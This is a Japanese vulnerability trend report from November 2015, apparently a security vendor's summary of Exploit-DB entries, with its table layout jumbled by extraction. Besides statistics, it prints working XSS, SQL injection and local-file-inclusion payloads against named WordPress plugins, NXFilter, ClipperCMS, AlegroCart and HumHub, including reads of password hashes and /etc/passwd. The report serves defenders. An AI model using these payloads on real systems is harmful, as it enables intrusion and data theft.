2015.11 EDB-Report 最新Web脆弱性トレンドレポート(2015.11) 2015.11.01~2015.11.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 ペンタセキュリティシステムズ株式会社R&Dセンター データセキュリティチーム サマリー 2015年11月は、脆弱性報告件数が最近になって最も少ない期間でした。しかし、Exploit-DBの分析結果をみると、攻撃の難易度や危険度の側面では前月と比べ、相変わらず危険な様子を見せています。 特に、SQLインジェクション(SQL Injection)攻撃に対する脆弱性報告件数が最も多かったが、単なる攻撃の成功可否を聞くクエリーではなく、実際のサーバのデータを抽出する難易度の高い攻撃で、危険度も早急 対応を要する攻撃でした。該当脆弱性が発見されたソフトウェアを使用する管理者は入力値検証をさらに厳しくするセキュリティパッチおよびセキュアコーディングを実施して、SQLインジェクション攻撃にさらされるないよう に注意が必要です。 脆弱性別件数 1. 脆弱性別件数 脆弱性カテゴリ ローカルファイル挿入 (Local File Inclusion:LFI) クロス サイト スクリプティング (Cross Site Scripting : XSS) SQL インジェクション (SQL Injection) 合計 8 7 7 6 件数 6 3 5 6 4 3 3 7 2 16 1 0 ローカルファイル挿入 クロス サイト スクリプティング SQL インジェクション (Local File (Cross Site Scripting : (SQL Injection) Inclusion:LFI) XSS) 2. 危険度別件数 危険度 件数 割合 早急対応要 10 63% 高 5 31% 中 1 6% 合計 16 100% 危険度別分類 1 早急対応要 5 高 中 10 3. 攻撃実行の難易度別件数 難易度 件数 割合 難 4 25% 中 4 25% 易 8 50% 合計 16 100% 攻撃実行の難易度別件数 4 難 中 8 易 4 4. 主なソフトウェア別脆弱性発生件数 ソフトウェア名 NXFilter AlegroCart ClipperCMS WordPress WP-Client HumHub YESWIKI 件数 4 4 3 2 1 1 1 合計 16 主なソフトウェア別脆弱性発生件数 5 4 4 4 NXFilter 3 3 2 AlegroCart 2 ClipperCMS 1 1 1 1 WordPress 0 WP-Client Copyright 2015 Penta Security Systems Inc. All rights reserved HumHub YESWIKI EDB-Report 最新Web脆弱性トレンドレポート(2015.11) 2015.11.01~2015.11.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 危険度分類基準 早急対応要:攻撃が成功した場合システムへ侵入可 高:システム情報を取得するか、あるいはクライアントに2次被害を及ぼす 中:情報漏洩 攻撃実行難易度分類基準 難:複数の脆弱性を突いた攻撃パターン、対象のシステムの重要な情報を取得 するため、高度な攻撃コードを採用したパターン、知らされていない攻撃 コードを採用したパターンのいずれかに該当する 中:攻撃手法自体は難しくないが、迂回コードを採用したパターン 易:1回のリクエストで攻撃が成立するパターン、複数回トライするも、 既知の攻撃コードを採用したパターンのいずれかに該当する ** 5件以上発生した主なソフトウェア別脆弱性の詳細情報 EDB 番号 脆弱性カテゴリ 攻撃難易度 危険度 Copyright 2015 Penta Security Systems Inc. All rights reserved 脆弱性名 ソフトウェア名 EDB-Report 最新Web脆弱性トレンドレポート(2015.11) 2015.11.01~2015.11.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 2015-11-06 EDB番号 38648 脆弱性カテゴリ XSS 攻撃難易度 易 危険度 中 2015-11-06 38646 XSS 易 高 2015-11-06 38646 XSS 易 高 2015-11-06 38646 XSS 易 高 脆弱性名 WordPress My Calendar Plugin 2.4.10 - admin.php XSS 脆弱性 攻撃コード POST /wordpress/wp-admin/admin.php?page=my-calendarcategories HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 _wpnonce=35ed9ab206&mode=add&category_id=4category_na me=<script>alert(document.cookie)</script>&category_c olor=&category_private=on&mc_default_category=on&mc_s kip_holidays_category=on&save=Add Category » NXFilter 3.0.3 /classifier,ruleset.jsp?action_flag=&page=1&kw=%22/%3 classifier,ruleset.jsp XSS 脆 E%3Cscript%3Ealert%28666%29%3C/script%3E&id=&domain=& 弱性 keyword=&points= /report,daily.jsp?stime=2015%2F10%2F17&time_option=ye sterday&user=%22/%3E%3Cscript%3Ealert%28String.fromCh NXFilter 3.0.3 arCode%2872%29%2bString.fromCharCode%2869%29%2bString report,daily.jsp XSS 脆弱性 .fromCharCode%2876%29%2bString.fromCharCode%2876%29%2 9%3C/script%3E POST /category,custom.jsp HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko NXFilter 3.0.3 Chrome/16.0.912.75 Safari/535.7 category,custom.jsp XSS 脆弱性 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 対象プログラム 対象環境 WordPress WordPress My Calendar Plugin 2.4.10 NXFilter NXFilter 3.0.3 NXFilter NXFilter 3.0.3 NXFilter NXFilter 3.0.3 NXFilter NXFilter 3.0.3 YESWIKI YESWIKI 0.2 WordPress WordPress WP Fastest Cache Plugin 0.8.4.8 ClipperCMS ClipperCMS 1.3.0 ClipperCMS ClipperCMS 1.3.0 description=<script>alert(666)</script> 2015-11-06 38645 XSS 易 高 2015-11-10 38665 LFI 中 早急対応要 2015-11-11 38678 SQL Injection 難 早急対応要 2015-11-16 2015-11-16 38729 38729 SQL Injection SQL Injection 中 難 早急対応要 早急対応要 POST /category,custom.jsp HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko NXFilter 3.0.3 - user,user.jsp Chrome/16.0.912.75 Safari/535.7 XSS 脆弱性 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 description=<script>alert(666)</script> /vul_test/yeswiki/wakka.php?wiki=HomePage/diaporama&t YESWIKI 0.2 - wakka.php LFI 脆 emplate=/../../../../../../../../../../../../etc/pass 弱性 wd POST /wp-admin/adminajax.php?action=wpfc_wppolls_ajax_request HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko WordPress WP Fastest Cache Chrome/16.0.912.75 Safari/535.7 Plugin 0.8.4.8 - adminAccept: */* ajax.php SQL Injection 脆弱性 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 ClipperCMS 1.3.0 - index.php SQL Injection 脆弱性 (1) ClipperCMS 1.3.0 - index.php SQL Injection 脆弱性 (2) poll_id=0 UNION (SELECT IF(substr(user_pass,1,1) = CHAR(36), SLEEP(5), 0) FROM `wp_users` WHERE ID = 1)%20--%20 /manager/index.php?a=88&id=1 AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) %23 POST /ClipperCMS-clipper_1.3.0/manager/index.php?a=32 HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 mode=12&id=3&blockedmode=0&stay=&oldusername=testtest &newusername=testtest' or extractvalue(1,concat(0x7e,(SELECT concat(user) FROM mysql.user limit 0,1))) -- &newpassword=0&passwordgenmethod=g&specifiedpassword= &confirmpassword=&passwordnotifymethod=s&fullname=&em ail=foo3%40example.com&oldemail=foo3%40example.com&ro le=2&phone=&mobilephone=&fax=&state=&zip=&country=&do b=&gender=&comment=&failedlogincount=0&blocked=0&bloc keduntil=&blockedafter=&manager_language=english&mana ger_login_startup=&allow_manager_access=1&allowed_ip= &manager_theme=&filemanager_path=&upload_images=&defa ult_upload_images=1&upload_media=&default_upload_medi a=1&upload_flash=&default_upload_flash=1&upload_files =&default_upload_files=1&upload_maxsize=&which_editor =&editor_css_path=&rb_base_dir=&rb_base_url=&tinymce_ editor_theme=&tinymce_custom_plugins=&tinymce_custom_ buttons1=&tinymce_custom_buttons2=&tinymce_custom_but tons3=&tinymce_custom_buttons4=&tinymce_css_selectors =&photo=&save=Submit+Query Copyright 2015 Penta Security Systems Inc. All rights reserved EDB-Report 最新Web脆弱性トレンドレポート(2015.11) 2015.11.01~2015.11.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 2015-11-16 EDB番号 38729 脆弱性カテゴリ SQL Injection 攻撃難易度 難 危険度 早急対応要 脆弱性名 ClipperCMS 1.3.0 - index.php SQL Injection 脆弱性 (3) 攻撃コード POST /ClipperCMS-clipper_1.3.0/manager/index.php?a=32 HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 mode=12&id=3&blockedmode=0&stay=&oldusername=testtest &newusername=testtest&newpassword=0&passwordgenmethod =g&specifiedpassword=&confirmpassword=&passwordnotify method=s&fullname=&email=foo6%40example.com&oldemail= foo3%40example.com&role=2&phone=&mobilephone=&fax=&st ate=&zip=&country=&dob= &gender=2', fax=(SELECT concat(user) FROM mysql.user limit 0,1), dob='0 &comment=&failedlogincount=0&blocked=0&blockeduntil=& blockedafter=&manager_language=english&manager_login_ startup=&allow_manager_access=1&allowed_ip=&manager_t heme=&filemanager_path=&upload_images=&default_upload _images=1&upload_media=&default_upload_media=1&upload _flash=&default_upload_flash=1&upload_files=&default_ upload_files=1&upload_maxsize=&which_editor=&editor_c ss_path=&rb_base_dir=&rb_base_url=&tinymce_editor_the me=&tinymce_custom_plugins=&tinymce_custom_buttons1=& tinymce_custom_buttons2=&tinymce_custom_buttons3=&tin ymce_custom_buttons4=&tinymce_css_selectors=&photo=&s ave=Submit+Query POST 対象プログラム 対象環境 ClipperCMS ClipperCMS 1.3.0 AlegroCart AlegroCart 1.2.8 AlegroCart AlegroCart 1.2.8 AlegroCart AlegroCart 1.2.8 AlegroCart AlegroCart 1.2.8 WP-Client WP-Client 3.8.7 HumHub HumHub 0.11.2 and 0.20.0beta.2 /ecommerce/AlegroCart_1.2.8/upload/admin2/?controller=r eport_logs HTTP/1.1 Host: 2015-11-16 38728 LFI 易 AlegroCart 1.2.8 早急対応要 /ecommerce/AlegroCart_1.2.8/up load/admin2/ LFI 脆弱性 User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 2015-11-16 2015-11-16 38728 38727 LFI SQL Injection 易 中 早急対応要 早急対応要 AlegroCart 1.2.8 - / LFI 脆弱 性 AlegroCart 1.2.8 /ecommerce/AlegroCart_1.2.82/upload/admin2/ SQL Injection 脆弱性 directory=error_log&file_path=/etc/passwd&decrytion=0 /shell.php?x=ls&foo=/var/www/ecommerce/AlegroCart_1.2 .8/upload/logs/error_log/var/www/ecommerce/AlegroCart _1.2.8/upload/logs/error_log/../../../../../../../etc /passwd POST /pages/en/files-manager-administration/addfile?path=home HTTP/1.1 Host: Connection: Close Accept: text/html, application/xhtml+xml, */* Accept-Language: ko-KR User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) Content-Type: multipart/form-data; boundary=--------------------------7dd10029908f2 -----------------------------7dd10029908f2 Content-Disposition: form-data; name="file"; filename="image.jpg' AND IF(SUBSTRING(version(), 1, 1)='5',BENCHMARK(100000000,ENCODE('MSG','by 5 seconds')),null) -- -" Content-Type: image/jpeg img -----------------------------7dd10029908f2-- 2015-11-16 2015-11-24 2015-11-30 38727 38803 38831 SQL Injection XSS SQL Injection 中 易 難 早急対応要 高 早急対応要 /ecommerce/AlegroCart_1.2.8AlegroCart 1.2.8 2/upload/?controller=checkout_process&method=return&t /ecommerce/AlegroCart_1.2.8x=REQUEST_TOKEN&ref=-1' AND IF(SUBSTRING(version(), 2/upload/ SQL Injection 脆弱性 1, 1)='5',BENCHMARK(50000000,ENCODE('MSG','by 5 seconds')),null) %23) WP-Client 3.8.7 /portal/request-estimate/ XSS 脆弱性 HumHub 0.11.2 and 0.20.0beta.2 - index.php SQL Injection 脆弱性 POST /portal/request-estimate/ HTTP/1.1 Host: User-Agent: Mozilla/5.0 Windows NT 6.1; WOW64 AppleWebKit/535.7 KHTML, like Gecko Chrome/16.0.912.75 Safari/535.7 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 wpc_data%5Baction%5D=request&wpc_data%5Btitle%5D=Requ est+Estimate+from+2015-1112&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bname%5D =&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bdescript ion%5D=&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D%5Bqu antity%5D=1&wpc_data%5Bitems%5D%5B%7Bnum_items%7D%5D% 5Bprice%5D=&wpc_data%5Bwpc_inv_message%5D=%3Cscript%3 Ealert%281%29%3C%2Fscript%3E /humhub/humhub0.11.2/index.php?r=directory/directory/stream&limit=4 &filters=entry_mine,visibility_public,&sort=c&from=5 AND (SELECT 7208 FROM(SELECT COUNT(*),CONCAT(0x7170627671,(SELECT (ELT(7208=7208,1))),0x7170786b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&mode=normal Copyright 2015 Penta Security Systems Inc. All rights reserved EDB-Report 最新Web脆弱性トレンドレポート(2015.11) 2015.11.01~2015.11.30 Exploit-DB(http://exploit-db.com)より公開されている内容に基づいた脆弱性トレンド情報です。 日付 EDB番号 脆弱性カテゴリ 攻撃難易度 危険度 脆弱性名 Copyright 2015 Penta Security Systems Inc. All rights reserved 攻撃コード 対象プログラム 対象環境
© Copyright 2024 ExpyDoc